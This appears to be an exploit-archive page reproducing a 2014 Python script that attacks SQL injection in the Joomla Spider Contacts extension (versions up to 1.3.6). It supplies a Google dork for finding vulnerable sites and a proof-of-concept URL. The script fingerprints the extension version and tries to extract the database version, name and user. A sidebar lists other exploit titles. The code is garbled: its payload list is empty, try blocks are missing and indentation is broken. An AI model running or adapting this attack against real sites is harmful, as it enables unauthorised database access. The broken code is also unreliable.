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Joomla Spider Contacts 1.3.6 (index.php, contacts_id param) - SQL Injection
来源:http://www.homelab.it 作者:Viviani 发布时间:2014-09-12  
#!/usr/bin/env python
# Exploit Title : Joomla Spider Contacts <= 1.3.6 SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://web-dorado.com/
# Software Link : http://web-dorado.com/?option=com_wdsubscriptions&view=dwnldfree&format=row&id=60 (fixed)
#   Mirror Link : https://mega.co.nz/#!mJwlUahJ!fx7d1ZQszaD3-k66PjWQEBXQafJnEeRDEleN8jqbVOE (no fixed)
# Dork Google: inurl:option=com_spidercontacts
# Date : 2014-09-07
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
# PoC Exploit:
# http://localhost/joomla/index.php?option=com_spidercontacts&contact_id=[SQLi]&view=showcontact&lang=ca
# "contacts_id" variables is not sanitized.
# Vulnerability Disclosure Timeline:
# 2014-09-07:  Discovered vulnerability
# 2014-09-09:  Vendor Notification
# 2014-09-10:  Vendor Response/Feedback 
# 2014-09-10:  Vendor Fix/Patch
# 2014-09-10:  Public Disclosure
import codecs
import httplib
import re
import sys
import socket
import optparse
banner = """
   $$$$$\                                   $$\                  $$$$$$\            $$\       $$\                      
   \__$$ |                                  $$ |                $$  __$$\           \__|      $$ |                     
      $$ | $$$$$$\   $$$$$$\  $$$$$$\$$$$\  $$ | $$$$$$\        $$ /  \__| $$$$$$\  $$\  $$$$$$$ | $$$$$$\   $$$$$$\   
      $$ |$$  __$$\ $$  __$$\ $$  _$$  _$$\ $$ | \____$$\       \$$$$$$\  $$  __$$\ $$ |$$  __$$ |$$  __$$\ $$  __$$\  
$$\   $$ |$$ /  $$ |$$ /  $$ |$$ / $$ / $$ |$$ | $$$$$$$ |       \____$$\ $$ /  $$ |$$ |$$ /  $$ |$$$$$$$$ |$$ |  \__| 
$$ |  $$ |$$ |  $$ |$$ |  $$ |$$ | $$ | $$ |$$ |$$  __$$ |      $$\   $$ |$$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |       
\$$$$$$  |\$$$$$$  |\$$$$$$  |$$ | $$ | $$ |$$ |\$$$$$$$ |      \$$$$$$  |$$$$$$$  |$$ |\$$$$$$$ |\$$$$$$$\ $$ |       
 \______/  \______/  \______/ \__| \__| \__|\__| \_______|       \______/ $$  ____/ \__| \_______| \_______|\__|       
                                                                          $$ |                                         
                                                                          $$ |                                         
 $$$$$$\                       $$\                           $$\                       $$\       $$$$$$\      $$$$$$\  
$$  __$$\                      $$ |                          $$ |                    $$$$ |     $$ ___$$\    $$  __$$\ 
$$ /  \__| $$$$$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$$\ $$$$$$\    $$$$$$$\       \_$$ |     \_/   $$ |   $$ /  \__|
$$ |      $$  __$$\ $$  __$$\\_$$  _|   \____$$\ $$  _____|\_$$  _|  $$  _____|        $$ |       $$$$$ /    $$$$$$$\  
$$ |      $$ /  $$ |$$ |  $$ | $$ |     $$$$$$$ |$$ /        $$ |    \$$$$$$\          $$ |       \___$$\    $$  __$$\ 
$$ |  $$\ $$ |  $$ |$$ |  $$ | $$ |$$\ $$  __$$ |$$ |        $$ |$$\  \____$$\         $$ |     $$\   $$ |   $$ /  $$ |
\$$$$$$  |\$$$$$$  |$$ |  $$ | \$$$$  |\$$$$$$$ |\$$$$$$$\   \$$$$  |$$$$$$$  |      $$$$$$\ $$\\$$$$$$  |$$\ $$$$$$  |
 \______/  \______/ \__|  \__|  \____/  \_______| \_______|   \____/ \_______/       \______|\__|\______/ \__|\______/ 
                                                                                         j00ml4 Spid3r C0nt4cts <= 1.3.6 SQLi
                                             Written by:
                                                   Claudio Viviani
C0mm4nds = dict()
C0mm4nds['DB VERS'] = 'VERSION'
C0mm4nds['DB NAME'] = 'DATABASE'
C0mm4nds['DB USER'] = 'CURRENT_USER'
def def_payload(payl):
    payl = payl
    return payl
def com_com_spidercalendar():
    com_spidercalendar = "index.php?option=com_spidercontacts&contact_id="+payload+"&view=showcontact&lang=ca"
    return com_spidercalendar
ver_spidercontacts = "administrator/components/com_spidercontacts/spidercontacts.xml"
vuln = 0
def cmdMySQL(cmd):
   SqlInjList = [
   # SQLi Spider Contacts 1.3.6
   # SQLi Spider Contacts 1.3.5 - 1.3.4
   # SQLi Spider Contacts 1.3.3
   # SQLi Spider Contacts 1.3
   # SQLi Spider Contacts 1.2 - 1.1 - 1.0
   return SqlInjList
def checkProtocol(pr):
    parsedHost = ""
    PORT =  m_oOptions.port
    if pr[0:8] == "https://":
        parsedHost = pr[8:]
        if parsedHost.endswith("/"):
            parsedHost = parsedHost.replace("/","")
            if PORT == 0:
                PORT = 443
        PROTO = httplib.HTTPSConnection(parsedHost, PORT)
    elif pr[0:7] == "http://":
        parsedHost = pr[7:]
        if parsedHost.endswith("/"):
            parsedHost = parsedHost.replace("/","")
        if PORT == 0:
            PORT = 80
        PROTO = httplib.HTTPConnection(parsedHost, PORT)
        parsedHost = pr
        if parsedHost.endswith("/"):
            parsedHost = parsedHost.replace("/","")
        if PORT == 0:
            PORT = 80
        PROTO = httplib.HTTPConnection(parsedHost, PORT)
    return PROTO, parsedHost
def connection(addr, url_string):
    parsedHost = checkProtocol(addr)[1]
    PROTO =  checkProtocol(addr)[0]
    except socket.gaierror:
        print 'Hostname could not be resolved. Exiting'
    connection_req =  checkProtocol(addr)[0]
        connection_req.request('GET', url_string)
    except socket.error:
        print('Connection Error')
    response = connection_req.getresponse()
    reader = codecs.getreader("utf-8")(response)
    return {'response':response, 'reader':reader}
if __name__ == '__main__':
    m_oOpts = optparse.OptionParser("%prog -H http[s]://Host_or_IP [-b, --base base_dir] [-p, --port PORT]")
    m_oOpts.add_option('--host', '-H', action='store', type='string',
        help='The address of the host running Spider Contacts extension(required)')
    m_oOpts.add_option('--base', '-b', action='store', type='string', default="/",
    help='base dir joomla installation, default "/")')
    m_oOpts.add_option('--port', '-p', action='store', type='int', default=0,
        help='The port on which the daemon is running (default 80)')
    m_oOptions, remainder = m_oOpts.parse_args()
    m_nHost = m_oOptions.host
    m_nPort = m_oOptions.port
    m_nBase = m_oOptions.base
    if not m_nHost:
        print m_oOpts.format_help()
    if m_nBase != "/":
    if m_nBase[0] == "/":
        m_nBase = m_nBase[1:]
        if m_nBase[-1] == "/":
            m_nBase = m_nBase[:-1]
        if m_nBase[-1] == "/":
            m_nBase = m_nBase[:-1]
    m_nBase = '/'+m_nBase+'/'
    payload = def_payload('1%27')
    com_spidercalendar = com_com_spidercalendar()
    # Start connection to host for Joomla Spider Contacts vulnerability
    response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
    reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
    # Read connection code number
    getcode = response.status
    print("[+] Searching for Joomla Spider Contacts vulnerability...")
    if getcode != 404:
        for lines in reader:
            if not lines.find("spidercontacts_contacts.id") == -1:
        print("[!] Boolean SQL injection vulnerability FOUND!")
                print("[+] Detection version in progress....")
                    response = connection(m_nHost, m_nBase+ver_spidercontacts).values()[0]
                    reader = connection(m_nHost, m_nBase+ver_spidercontacts).values()[1]
                    getcode = response.status
                    if getcode != 404:
                        for line_version in reader:
                           if not line_version.find("<version>") == -1:
                               VER = re.compile('>(.*?)<').search(line_version).group(1)
                               VER_REP = VER.replace(".","")
                               if int(VER_REP) > 136 or int(VER_REP[0]) == 2:
                                   print("[X] VERSION: "+VER)
                                   print("[X] Joomla Spider Contacts => 1.3.7 are not vulnerables")
                               elif int(VER_REP) == 136:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                           paysql = cmdMySQL(cmdsqli)[0]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                               elif int(VER_REP) == 135 or int(VER_REP) == 134:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                           paysql = cmdMySQL(cmdsqli)[1]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                               elif int(VER_REP) == 133:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                           paysql = cmdMySQL(cmdsqli)[2]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                               elif int(VER_REP) == 13:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                           paysql = cmdMySQL(cmdsqli)[3]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                               elif int(VER_REP[:2]) == 10 or int(VER_REP[:2]) == 11 or int(VER_REP[:2]) == 12:
                                   print("[+] EXTENSION VERSION: "+VER)
                                   for  cmddesc, cmdsqli in C0mm4nds.items():
                                           paysql = cmdMySQL(cmdsqli)[4]
                                           payload = def_payload(paysql)
                                           com_spidercalendar = com_com_spidercalendar()
                                           response = connection(m_nHost, m_nBase+com_spidercalendar).values()[0]
                                           reader = connection(m_nHost, m_nBase+com_spidercalendar).values()[1]
                                           getcode = response.status
                                           if getcode != 404:
                                              for line_response in reader:
                                                  if not line_response.find("h0m3l4b1t") == -1:
                                                      MYSQL_VER = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(line_response).group(1)
                                                      if vuln == 0:
                                                          print("[!] "+m_nHost+" VULNERABLE!!!")
                                                      print("[!] "+cmddesc+" : "+MYSQL_VER)
                                                      vuln = 1
                                       except socket.error:
                                           print('[X] Connection was lost please retry')
                                   print("[-] EXTENSION VERSION: Unknown :(")
                        if int(vuln) == 0:
                            # VERSION NOT VULNERABLE :(
                            print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
                except socket.error:
                    print('[X] Connection was lost please retry')
    print("[X] Spider Contacts patched or SQLi blocked by Web Application Firewall")
        print('[X] URL "'+m_nHost+m_nBase+com_spidercalendar+'" NOT FOUND')

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·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Onlineon E-Ticaret Database Di
·WWW File Share Pro 7.0 Denial
·SolarWinds Storage Manager Aut
·Apple iOS 7.1.2 Merge Apps Ser
·ManageEngine Eventlog Analyzer
·LeapFTP 3.1.0 URL Handling Buf
·Railo 4.2.1 Remote File Inclus
·Google Chrome 31.0 XSS Auditor
·Rooted SSH/SFTP Daemon Default
·Android Browser Same Origin Po
·HttpFileServer 2.3.x Remote Co
·Wing FTP Server Authenticated
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